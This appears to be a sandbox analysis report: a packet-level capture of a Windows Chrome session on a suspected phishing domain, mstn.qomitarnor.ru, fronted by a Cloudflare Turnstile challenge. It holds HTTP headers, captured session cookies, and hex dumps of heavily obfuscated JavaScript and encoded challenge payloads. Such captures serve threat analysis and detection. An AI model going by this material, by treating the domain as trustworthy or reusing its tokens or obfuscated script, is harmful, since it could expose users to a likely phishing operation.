                                                            Data Ascii: M[gU(709)][gU(466)]+'='+D)}catch(E){}},eM[gJ(312)]=function(d,gV,e,f,g,h,i,j,o,k,l,m){if(gV=gJ,e={'ZvALP':gV(1214),'vCAYh':gV(1456),'eNLkz':function(n,o){return n>o},'sMLnl':function(n,o){return o===n},'IPWMb':gV(417),'FXrdS':gV(1637),'lXIKe':function(n,o
                                                            2025-01-15 16:02:07 UTC1369INData Raw: 20 76 2b 42 7d 2c 27 41 6a 63 51 71 27 3a 66 75 6e 63 74 69 6f 6e 28 76 2c 42 29 7b 72 65 74 75 72 6e 20 76 3c 3c 42 7d 2c 27 48 56 72 6a 56 27 3a 66 75 6e 63 74 69 6f 6e 28 76 2c 42 2c 67 5a 29 7b 72 65 74 75 72 6e 20 67 5a 3d 62 2c 6b 5b 67 5a 28 33 39 37 29 5d 28 76 2c 42 29 7d 7d 2c 6b 5b 68 30 28 31 35 32 32 29 5d 28 68 30 28 31 36 37 33 29 2c 68 30 28 31 36 37 33 29 29 29 7b 42 3d 28 78 3d 30 2c 30 29 3b 64 6f 7b 43 3d 6f 2e 68 5b 73 2e 67 5e 32 34 38 5d 5b 33 5d 5e 73 5b 68 30 28 31 32 37 38 29 5d 28 73 5b 68 30 28 31 35 34 31 29 5d 28 76 2e 68 5b 78 2e 67 5e 32 34 38 2e 35 31 5d 5b 31 5d 5b 68 30 28 31 32 36 33 29 5d 28 42 2e 68 5b 32 34 38 2e 39 33 5e 43 2e 67 5d 5b 30 5d 2b 2b 29 2d 31 32 30 2c 32 35 36 29 2c 32 35 35 29 2c 78 7c 3d 73 5b 68 30
                                                            Data Ascii: v+B},'AjcQq':function(v,B){return v<<B},'HVrjV':function(v,B,gZ){return gZ=b,k[gZ(397)](v,B)}},k[h0(1522)](h0(1673),h0(1673))){B=(x=0,0);do{C=o.h[s.g^248][3]^s[h0(1278)](s[h0(1541)](v.h[x.g^248.51][1][h0(1263)](B.h[248.93^C.g][0]++)-120,256),255),x|=s[h0
                                                            2025-01-15 16:02:07 UTC1369INData Raw: 74 68 69 73 2e 67 5e 31 39 5d 3d 61 31 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 30 27 3a 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 32 35 33 5d 3d 61 62 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 31 27 3a 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 39 31 2e 34 38 5d 3d 50 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 32 27 3a 74 68 69 73 2e 67 3d 31 2b 78 5b 68 32 28 37 36 32 29 5d 28 33 65 34 2c 4e 5b 68 32 28 31 31 30 34 29 5d 28 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 33 27 3a 74 68 69 73 2e 68 5b 78 5b 68 32 28 31 32 37 34 29 5d 28 39 37 2c 74 68 69 73 2e 67 29 5d 3d 54 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 34 27 3a 74 68 69 73 2e 68 5b 36 35 5e 74 68 69 73 2e 67 5d 3d 61 63 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73
                                                            Data Ascii: this.g^19]=a1;continue;case'10':this.h[this.g^253]=ab;continue;case'11':this.h[this.g^191.48]=P;continue;case'12':this.g=1+x[h2(762)](3e4,N[h2(1104)]());continue;case'13':this.h[x[h2(1274)](97,this.g)]=T;continue;case'14':this.h[65^this.g]=ac;continue;cas
                                                            2025-01-15 16:02:07 UTC1369INData Raw: 68 4f 28 31 36 36 39 29 5d 29 72 65 74 75 72 6e 20 65 28 66 29 3b 65 6c 73 65 20 66 59 28 29 7d 2c 31 65 33 29 3a 65 26 26 65 5b 68 4e 28 38 32 33 29 5d 3d 3d 3d 64 5b 68 4e 28 36 35 38 29 5d 26 26 64 5b 68 4e 28 38 30 37 29 5d 28 65 5b 68 4e 28 37 38 35 29 5d 2c 64 5b 68 4e 28 33 39 31 29 5d 29 26 26 64 5b 68 4e 28 31 32 37 31 29 5d 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 2c 66 79 29 7d 29 2c 66 41 3d 21 5b 5d 2c 21 66 31 28 67 4a 28 31 35 37 37 29 29 26 26 28 66 59 28 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 69 6c 2c 63 2c 64 2c 65 29 7b 69 6c 3d 67 4a 2c 63 3d 7b 27 6a 58 7a 6c 55 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 2c 27 66 72 51 7a 77 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65
                                                            Data Ascii: hO(1669)])return e(f);else fY()},1e3):e&&e[hN(823)]===d[hN(658)]&&d[hN(807)](e[hN(785)],d[hN(391)])&&d[hN(1271)](clearInterval,fy)}),fA=![],!f1(gJ(1577))&&(fY(),setInterval(function(il,c,d,e){il=gJ,c={'jXzlU':function(f){return f()},'frQzw':function(f){re
                                                            2025-01-15 16:02:07 UTC1369INData Raw: 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 3d 69 7d 2c 27 44 66 47 48 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 67 51 41 63 67 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 53 78 48 59 78 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 56 57 6d 6c 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 79 4a 50 56 59 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 58 68 62 4d 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 79 44 69 6b 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b
                                                            Data Ascii: ction(h,i){return h!==i},'DfGHz':function(h,i){return h>i},'gQAcg':function(h,i){return i==h},'SxHYx':function(h,i){return h>i},'VWmlh':function(h,i){return h==i},'yJPVY':function(h,i){return h(i)},'XhbMD':function(h,i){return h<<i},'yDikQ':function(h,i){


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.1649730188.114.96.34436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:07 UTC1320OUTGET /favicon.ico HTTP/1.1
                                                            Host: mstn.qomitarnor.ru
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://mstn.qomitarnor.ru/JY1H/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: XSRF-TOKEN=eyJpdiI6IklMOW9BbVA4YTg5YncyWmMzMzI5d1E9PSIsInZhbHVlIjoiZmxzV0t5MmNFemdKRzlvRkhqT3RzT2pKZTBlNVpxamZFV2Q3bDRiRkF2TFcxdlZWd3dpSm1lZDNhRUZ2SVVINVFicFZTRFdJeXZMRURGWi80amc0cHpDbjVRVFpnUks0YlFBZkxXdjJZbDZSRElGWFBzdEovMVFzVlQzNUY4ZnAiLCJtYWMiOiI5MGM5MTRjZmI3NzhkYTk0NTMzMTJjM2RmMDFiYzQ2MDg3ZDVhNWFkOWVkMGJjZDEwODY5NzUzMzc4NTAyODdiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktiZEw1ZmxJMlRpcHVDNWF6OXh1SlE9PSIsInZhbHVlIjoiY1F1dm5YUUpxbTgyVk44OGFlMDI3UWUwYVdvNmhBL0hKSy9GcEptakFKQUV6akNXRGNBYVljUERSMC9ubDJYd2hFK3BWK1RHNU96cWVyNjEwSzFBa1ZYeTNaUldUbE1pOWF5MXk1SFdlNzVzVTVLZE5kY3dNS2NmYXZYK2haSC8iLCJtYWMiOiJhNWQwNzFiN2Y2NzFjYTY0YTA3ZDlkODQ4MjczNGIyZjY2ZDIzNjI0NGQ3ZTBlOGEwOGJkODNiMGZmYmJjNmNiIiwidGFnIjoiIn0%3D
                                                            2025-01-15 16:02:07 UTC1065INHTTP/1.1 404 Not Found
                                                            Date: Wed, 15 Jan 2025 16:02:07 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Cache-Control: max-age=14400
                                                            Age: 3175
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MLscRZrzv7RzBaZ6VSP1fRDHyk5j%2FVISJPU7HCfQXVaqCxZmuxzhD%2FwkNCbjQInzEhXsDXffgy5w5ujr6pqEn6AsBUxXnr4Pfl0lw877s3Da2NOLBxPA2HIUiHF0qw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Vary: Accept-Encoding
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=5026&min_rtt=4992&rtt_var=1428&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2823&recv_bytes=2260&delivery_rate=563291&cwnd=245&unsent_bytes=0&cid=7711d819a216f9c7&ts=38&x=0"
                                                            CF-Cache-Status: HIT
                                                            Server: cloudflare
                                                            CF-RAY: 9027169a9b80a261-YUL
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=17856&min_rtt=17851&rtt_var=6705&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1898&delivery_rate=163155&cwnd=32&unsent_bytes=0&cid=46a47dcab5fc88a4&ts=195&x=0"
                                                            2025-01-15 16:02:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.1649731104.18.95.414436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:07 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/2036730794:1736955028:x9_TEsImu3BSZM-HOgmsaGKzqEYCyP6QKi0CWNkTTWE/90271690994917b5/nwEvxiy9_h.VA75YrykS5NQcuBWoqQY0GFV3Y._y2mU-1736956925-1.1.1.1-xZxg4qxDwDzmvMHim.y5exA6yfk_UhVsjIKIwW2cQiQFWSNPrVfO6rAaAZtc0PAz HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 3171
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            Content-type: application/x-www-form-urlencoded
                                                            CF-Chl-RetryAttempt: 0
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            CF-Challenge: nwEvxiy9_h.VA75YrykS5NQcuBWoqQY0GFV3Y._y2mU-1736956925-1.1.1.1-xZxg4qxDwDzmvMHim.y5exA6yfk_UhVsjIKIwW2cQiQFWSNPrVfO6rAaAZtc0PAz
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://challenges.cloudflare.com
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/09y8e/0x4AAAAAAA5J-xX8Izs2GVzM/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 16:02:07 UTC3171OUTData Raw: 76 5f 39 30 32 37 31 36 39 30 39 39 34 39 31 37 62 35 3d 7a 25 32 62 58 42 24 42 34 42 49 42 56 42 79 69 4f 35 69 4f 65 42 69 6d 6b 52 44 33 6d 4f 53 69 71 71 4f 6c 4d 4f 6b 39 42 69 36 4f 67 42 6b 58 33 6b 41 36 58 4f 4c 75 36 4f 72 74 69 66 7a 4f 38 42 69 65 58 4f 6b 6e 78 2b 46 43 4f 6e 52 4f 4e 4f 69 2b 4f 6e 58 77 39 4f 4d 4f 46 39 6b 71 4f 52 39 75 58 4f 49 7a 74 46 33 30 42 64 4c 75 79 63 70 74 47 43 6a 4f 2b 4e 39 46 68 4f 51 71 35 6f 6a 2d 43 39 72 51 79 4b 6d 54 31 42 4f 30 36 68 4f 4f 41 42 46 61 56 4f 69 55 76 49 31 6a 4f 43 51 42 4f 64 74 4f 33 41 56 58 30 59 79 47 48 66 56 70 53 75 73 41 57 4b 72 71 4f 47 50 2b 71 4d 6b 30 4f 46 74 6d 4b 4f 4f 57 61 4f 69 57 54 31 58 4f 74 24 42 4f 52 4b 74 4f 44 63 55 62 55 43 4d 46 54 43 52 4f 64 31 4d 6d
                                                            Data Ascii: v_90271690994917b5=z%2bXB$B4BIBVByiO5iOeBimkRD3mOSiqqOlMOk9Bi6OgBkX3kA6XOLu6OrtifzO8BieXOknx+FCOnRONOi+OnXw9OMOF9kqOR9uXOIztF30BdLuycptGCjO+N9FhOQq5oj-C9rQyKmT1BO06hOOABFaVOiUvI1jOCQBOdtO3AVX0YyGHfVpSusAWKrqOGP+qMk0OFtmKOOWaOiWT1XOt$BORKtODcUbUCMFTCROd1Mm
                                                            2025-01-15 16:02:07 UTC751INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 16:02:07 GMT
                                                            Content-Type: text/plain; charset=UTF-8
                                                            Content-Length: 153128
                                                            Connection: close
                                                            cf-chl-gen: 43Ic+yZhSBTO/HCgi07MXQQHyNXG9RQ53lSfk46OPW/MwZq3Fj2V1P0CG+KTDchKvq4fQR9NgGN4uQabOT7Eyr2j07T/qkc115HrKmVxJKBqT7HoK0wEU+nA38fJ9eGTHdJSr7+H5govf2R9f6pnOpzslGKuVYqii5hxeoeJMrrDaOxShKAFkVTczODdfkmSRn2uz2744WVwMNqaeuMv5bc5GZtWcVVfOJ05mZHVZiHg5O8u/jTQb9oBXflTS9+FZcLj7ZHxaYcJWOQunRDUBKwgjJXrYDCdjyzMQ/9hYGWlXWfDHFF+Kj4+Jmi4nClR6zEPBMzqnV7TKx/c+u1O7nv6oUsjL4cmi1XZcogSzHdOLVJOhS0gM8AQQrM3xLeWD/HM3MZS+/YdnM6LeX/+naQu7DvyVwZ7Bdb7r3+DxR7wdKZtxtgFCxxx/fCRj2gSvRa4gvk62exosCRleCYywzNN3iMfs3hXbLFRlwQcbKY=$RLAnt9iUt6JgLBY80IvSXw==
                                                            Server: cloudflare
                                                            CF-RAY: 9027169ae8044319-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-15 16:02:07 UTC618INData Raw: 52 6b 4e 39 68 34 5a 33 69 49 79 4a 55 6d 52 6b 63 30 6d 59 6a 70 4a 61 61 32 6d 62 6d 58 61 61 61 31 75 64 6e 35 36 68 64 6e 36 6c 5a 70 6d 6e 64 32 65 6c 71 36 71 74 67 71 53 74 69 5a 65 31 67 33 4f 39 74 37 61 6e 6e 6e 32 37 76 5a 53 55 70 48 6e 49 77 62 79 65 68 63 48 4b 70 59 75 67 73 63 2f 55 6a 73 37 50 79 61 54 54 31 62 4c 5a 32 4d 66 59 6f 61 75 62 6e 74 2f 68 75 4c 36 6a 35 37 7a 43 70 2b 7a 70 32 4d 7a 77 73 4f 7a 78 76 37 44 44 38 2f 47 36 79 74 62 79 7a 37 6e 67 77 66 48 76 38 73 54 5a 2b 4d 4d 4a 79 75 59 44 44 63 37 34 30 65 38 45 37 68 49 51 42 66 6a 75 34 39 54 75 45 68 45 54 32 42 4d 57 48 67 44 30 43 42 51 70 4b 79 66 71 46 76 67 72 41 79 59 41 4a 43 34 49 2f 69 34 32 4a 43 6f 79 4d 77 6f 70 48 2f 73 70 2f 6a 6f 67 46 45 4d 36 4f 67 4a
                                                            Data Ascii: RkN9h4Z3iIyJUmRkc0mYjpJaa2mbmXaaa1udn56hdn6lZpmnd2elq6qtgqStiZe1g3O9t7annn27vZSUpHnIwbyehcHKpYugsc/Ujs7PyaTT1bLZ2MfYoaubnt/huL6j57zCp+zp2MzwsOzxv7DD8/G6ytbyz7ngwfHv8sTZ+MMJyuYDDc740e8E7hIQBfju49TuEhET2BMWHgD0CBQpKyfqFvgrAyYAJC4I/i42JCoyMwopH/sp/jogFEM6OgJ
                                                            2025-01-15 16:02:07 UTC1369INData Raw: 52 4c 46 42 64 54 55 6b 39 4e 50 31 74 63 4d 6a 5a 43 47 32 70 73 5a 79 78 41 4b 32 68 43 58 7a 35 78 62 69 39 59 63 57 64 6c 54 56 31 58 4e 33 68 75 63 54 6c 2f 66 55 35 64 65 6d 42 32 67 6c 64 38 67 32 74 61 55 45 69 4b 66 6f 4b 4c 66 6e 47 51 61 59 4a 34 6c 47 39 55 61 70 6d 4a 58 5a 53 41 58 59 2b 63 6f 58 74 32 66 58 6d 4c 5a 33 65 6d 6b 61 71 69 6f 4a 4e 30 73 6f 61 36 69 71 2b 55 73 4a 32 2b 72 4b 74 38 73 72 71 41 75 58 32 69 75 4c 6d 4b 75 36 6d 6f 76 4c 6d 63 73 35 32 6e 72 35 4c 47 6a 35 54 46 7a 70 71 76 30 70 72 5a 32 37 69 66 74 39 50 50 32 4c 36 7a 79 71 47 32 32 62 2b 6f 79 74 33 44 38 63 37 68 78 2f 62 53 35 63 76 37 31 75 6e 50 2b 4e 72 74 30 2f 37 65 38 64 63 45 34 76 58 62 41 65 62 35 33 77 62 71 2f 65 4d 4d 37 67 4c 6f 34 76 49 47 37
                                                            Data Ascii: RLFBdTUk9NP1tcMjZCG2psZyxAK2hCXz5xbi9YcWdlTV1XN3hucTl/fU5demB2gld8g2taUEiKfoKLfnGQaYJ4lG9UapmJXZSAXY+coXt2fXmLZ3emkaqioJN0soa6iq+UsJ2+rKt8srqAuX2iuLmKu6movLmcs52nr5LGj5TFzpqv0prZ27ift9PP2L6zyqG22b+oyt3D8c7hx/bS5cv71unP+Nrt0/7e8dcE4vXbAeb53wbq/eMM7gLo4vIG7
                                                            2025-01-15 16:02:07 UTC1369INData Raw: 78 4d 47 4a 68 55 47 4d 77 51 6a 59 6e 50 55 56 5a 58 32 55 35 5a 32 4e 64 5a 32 74 6e 57 54 42 76 61 32 52 4a 63 32 39 6f 63 33 64 7a 63 6a 78 37 64 33 64 35 61 58 56 4d 64 34 4e 2f 66 6d 5a 50 61 56 36 42 5a 6c 5a 6f 63 6f 64 6f 6b 6e 61 4b 56 5a 5a 36 6a 32 32 61 66 70 4b 67 6e 6f 4b 57 70 71 4b 47 6d 71 75 6d 69 70 36 6f 71 6f 36 69 72 61 36 53 70 72 4f 79 6c 71 72 41 6b 5a 32 69 6b 37 75 66 77 4d 4b 2f 6f 38 47 45 77 36 66 42 76 38 65 72 76 63 6e 48 78 62 44 51 30 5a 65 6a 75 5a 69 61 6d 38 36 70 6d 72 33 64 32 36 50 69 70 2b 66 67 6f 37 36 72 32 2b 54 4a 33 62 2f 6b 77 65 57 30 79 50 54 32 34 62 50 7a 39 50 6a 53 7a 75 48 58 41 2f 33 31 35 66 62 37 30 76 6a 63 42 50 54 74 2b 65 54 4f 35 4e 77 4b 45 76 30 59 34 68 62 58 30 77 30 5a 38 65 6a 66 48 4e
                                                            Data Ascii: xMGJhUGMwQjYnPUVZX2U5Z2NdZ2tnWTBva2RJc29oc3dzcjx7d3d5aXVMd4N/fmZPaV6BZlZocodoknaKVZZ6j22afpKgnoKWpqKGmqumip6oqo6ira6SprOylqrAkZ2ik7ufwMK/o8GEw6fBv8ervcnHxbDQ0ZejuZiam86pmr3d26Pip+fgo76r2+TJ3b/kweW0yPT24bPz9PjSzuHXA/315fb70vjcBPTt+eTO5NwKEv0Y4hbX0w0Z8ejfHN
                                                            2025-01-15 16:02:07 UTC1369INData Raw: 56 54 74 68 52 6c 6b 2f 5a 30 70 64 52 44 35 4f 59 55 68 46 53 57 52 37 4d 33 78 70 55 45 63 36 64 7a 31 55 50 33 61 46 68 6c 56 49 61 48 70 5a 53 30 42 2b 58 56 42 6b 67 6d 46 53 6b 6f 5a 6c 56 6c 4f 4b 61 56 70 5a 66 56 78 65 57 35 4a 74 58 6f 53 62 6d 6f 47 67 69 4a 6c 37 6e 6f 46 2b 67 4c 4b 41 6f 32 79 6e 73 62 4f 5a 73 70 57 73 65 71 71 4f 76 37 69 51 65 5a 69 65 66 70 43 6d 70 62 4b 69 78 4c 57 45 6d 4d 6d 35 77 4d 65 77 6a 72 4f 6c 6c 70 69 71 31 71 36 6c 76 4c 72 50 6d 4e 4c 58 31 72 33 63 79 4e 57 35 79 4c 32 35 7a 4f 33 6d 33 36 6a 72 37 65 7a 76 78 63 48 76 38 65 76 30 30 4e 61 31 2b 64 32 34 36 74 72 38 34 2b 50 56 78 73 6a 79 34 67 58 66 78 4e 67 4b 2b 51 49 42 42 78 51 43 43 67 37 68 45 41 7a 39 31 42 51 51 43 65 30 59 46 41 30 59 48 42 67
                                                            Data Ascii: VTthRlk/Z0pdRD5OYUhFSWR7M3xpUEc6dz1UP3aFhlVIaHpZS0B+XVBkgmFSkoZlVlOKaVpZfVxeW5JtXoSbmoGgiJl7noF+gLKAo2ynsbOZspWseqqOv7iQeZiefpCmpbKixLWEmMm5wMewjrOllpiq1q6lvLrPmNLX1r3cyNW5yL25zO3m36jr7ezvxcHv8ev00Na1+d246tr84+PVxsjy4gXfxNgK+QIBBxQCCg7hEAz91BQQCe0YFA0YHBg
                                                            2025-01-15 16:02:07 UTC1369INData Raw: 6b 6c 4c 50 6c 4a 78 4d 6b 4a 57 64 6e 46 47 57 6e 52 39 57 30 68 4b 55 31 39 4f 56 32 5a 6d 65 59 42 48 68 6b 70 70 66 30 64 4e 68 6d 35 7a 61 4a 46 6e 61 6d 5a 34 6c 5a 71 54 6d 58 42 58 6d 35 74 67 63 34 46 67 59 31 2b 62 68 61 57 57 58 61 4b 74 62 4b 6c 72 73 71 79 6b 6a 4b 5a 31 68 70 6d 50 75 72 4b 31 74 35 42 2f 76 35 61 79 72 36 32 6b 72 33 6d 68 77 61 65 55 69 38 6d 4a 6d 4a 33 53 78 4d 65 74 72 63 48 48 7a 61 48 50 79 38 54 50 30 38 2f 4f 6d 4e 66 54 30 39 58 46 30 61 6a 54 33 39 76 61 77 71 76 46 75 74 33 43 73 75 66 47 34 63 54 49 30 75 61 78 38 74 62 72 79 64 48 64 34 74 50 37 34 64 6f 44 2b 2f 6e 6b 42 51 72 32 79 75 33 72 2b 73 73 49 38 51 6a 50 79 51 38 59 42 67 37 61 37 77 2f 78 47 66 58 35 38 43 4d 4f 45 2b 66 79 47 53 63 6b 46 51 73 66
                                                            Data Ascii: klLPlJxMkJWdnFGWnR9W0hKU19OV2ZmeYBHhkppf0dNhm5zaJFnamZ4lZqTmXBXm5tgc4FgY1+bhaWWXaKtbKlrsqykjKZ1hpmPurK1t5B/v5ayr62kr3mhwaeUi8mJmJ3SxMetrcHHzaHPy8TP08/OmNfT09XF0ajT39vawqvFut3CsufG4cTI0uax8tbrydHd4tP74doD+/nkBQr2yu3r+ssI8QjPyQ8YBg7a7w/xGfX58CMOE+fyGSckFQsf
                                                            2025-01-15 16:02:07 UTC1369INData Raw: 38 33 62 6e 64 6c 54 54 70 51 56 48 52 39 61 54 39 5a 67 6d 39 6b 52 34 5a 47 51 34 64 46 58 6f 6d 4b 65 6d 6c 6f 66 49 74 78 5a 5a 53 58 55 6e 53 50 58 49 31 63 6d 6c 75 69 64 70 4a 39 67 47 5a 78 65 71 65 56 6d 36 46 31 6f 35 2b 52 61 4b 65 6a 6e 49 47 72 70 36 43 72 72 36 75 71 64 4c 4f 76 72 37 47 68 72 59 53 76 75 37 65 32 6e 6f 65 68 6c 72 6d 65 6a 73 4c 4d 76 71 43 30 72 73 4b 4e 7a 72 4c 48 70 64 4b 32 79 74 6a 57 75 73 37 66 74 63 47 36 74 2b 6a 59 35 75 50 56 34 39 6e 69 72 73 54 51 73 65 7a 4a 7a 50 4c 77 38 4c 54 48 2b 65 32 38 2b 63 7a 63 38 50 62 4e 76 75 55 43 41 63 6a 67 77 64 62 38 43 73 7a 34 32 66 72 74 44 64 44 2b 39 42 48 72 30 4f 59 57 42 74 54 73 45 79 41 4f 46 2b 4c 33 46 78 30 69 49 78 38 6f 4a 68 59 62 43 2f 6e 71 42 69 34 73 38
                                                            Data Ascii: 83bndlTTpQVHR9aT9Zgm9kR4ZGQ4dFXomKemlofItxZZSXUnSPXI1cmluidpJ9gGZxeqeVm6F1o5+RaKejnIGrp6Crr6uqdLOvr7GhrYSvu7e2noehlrmejsLMvqC0rsKNzrLHpdK2ytjWus7ftcG6t+jY5uPV49nirsTQsezJzPLw8LTH+e28+czc8PbNvuUCAcjgwdb8Csz42frtDdD+9BHr0OYWBtTsEyAOF+L3Fx0iIx8oJhYbC/nqBi4s8
                                                            2025-01-15 16:02:07 UTC1369INData Raw: 56 61 57 38 2b 55 33 70 33 64 57 39 67 65 45 56 52 64 58 31 4b 58 30 74 2b 62 32 32 47 63 59 39 52 66 34 79 53 56 6d 35 71 66 4a 53 63 6d 32 68 36 62 6c 39 31 66 5a 47 58 6e 58 47 66 6d 34 31 6b 6f 35 2b 59 66 61 65 6a 6e 4b 65 72 70 36 5a 77 72 36 75 72 72 5a 32 70 67 4b 75 33 73 37 4b 61 67 35 32 53 74 5a 71 4b 70 72 7a 4b 78 37 76 48 79 4c 54 42 70 4b 43 6d 75 63 58 61 30 39 65 5a 33 72 48 51 6e 75 43 31 73 70 2f 64 33 62 75 6f 77 4f 62 70 79 2b 58 4b 75 61 72 52 37 65 33 56 78 76 4c 50 34 2f 44 57 36 37 62 52 2b 66 6e 4a 32 63 33 4d 42 50 7a 6f 41 66 37 79 33 64 6e 73 42 67 34 41 79 41 77 4f 44 51 38 44 41 67 6b 51 46 78 62 6d 44 52 4c 59 44 39 6a 38 46 41 30 58 2f 4f 63 44 46 42 59 63 36 67 41 6e 37 69 34 61 37 2b 30 7a 4d 53 63 52 49 68 6b 52 4e 42
                                                            Data Ascii: VaW8+U3p3dW9geEVRdX1KX0t+b22GcY9Rf4ySVm5qfJScm2h6bl91fZGXnXGfm41ko5+YfaejnKerp6Zwr6urrZ2pgKu3s7Kag52StZqKprzKx7vHyLTBpKCmucXa09eZ3rHQnuC1sp/d3buowObpy+XKuarR7e3VxvLP4/DW67bR+fnJ2c3MBPzoAf7y3dnsBg4AyAwODQ8DAgkQFxbmDRLYD9j8FA0X/OcDFBYc6gAn7i4a7+0zMScRIhkRNB
                                                            2025-01-15 16:02:07 UTC1369INData Raw: 64 30 47 44 67 47 57 46 64 6b 53 44 65 33 6d 42 54 6d 4f 43 54 5a 4b 50 64 6d 53 56 67 6d 78 56 62 35 6c 56 66 6e 53 68 65 33 42 38 6c 6d 61 46 5a 47 65 53 6e 33 56 6d 67 4b 4f 69 6a 6d 71 6e 70 5a 35 76 6c 58 52 33 6b 4b 79 46 64 70 43 70 6b 36 2b 4f 6e 4a 71 66 6f 36 57 45 68 6f 4f 36 6c 59 61 6f 77 38 4b 70 79 4c 50 42 6f 38 71 70 70 72 6a 5a 30 63 75 55 7a 39 6e 59 32 37 47 74 32 39 33 58 34 4c 7a 43 36 62 50 4b 79 64 62 47 36 4d 4f 6f 76 4f 33 65 39 73 54 45 39 2b 58 75 38 2f 54 4b 30 63 37 67 41 76 6e 7a 76 75 55 43 42 4f 6b 44 35 66 7a 4b 2b 74 34 51 43 65 44 4a 38 2f 50 6b 37 78 55 55 42 67 77 53 35 52 51 51 41 74 67 59 46 41 33 78 48 42 67 52 48 43 41 63 47 2b 51 6b 49 43 41 69 45 68 37 30 49 43 77 6f 4a 77 2f 33 45 67 63 71 44 2f 37 79 2b 53 30
                                                            Data Ascii: d0GDgGWFdkSDe3mBTmOCTZKPdmSVgmxVb5lVfnShe3B8lmaFZGeSn3VmgKOijmqnpZ5vlXR3kKyFdpCpk6+OnJqfo6WEhoO6lYaow8KpyLPBo8qpprjZ0cuUz9nY27Gt293X4LzC6bPKydbG6MOovO3e9sTE9+Xu8/TK0c7gAvnzvuUCBOkD5fzK+t4QCeDJ8/Pk7xUUBgwS5RQQAtgYFA3xHBgRHCAcG+QkICAiEh70ICwoJw/3EgcqD/7y+S0
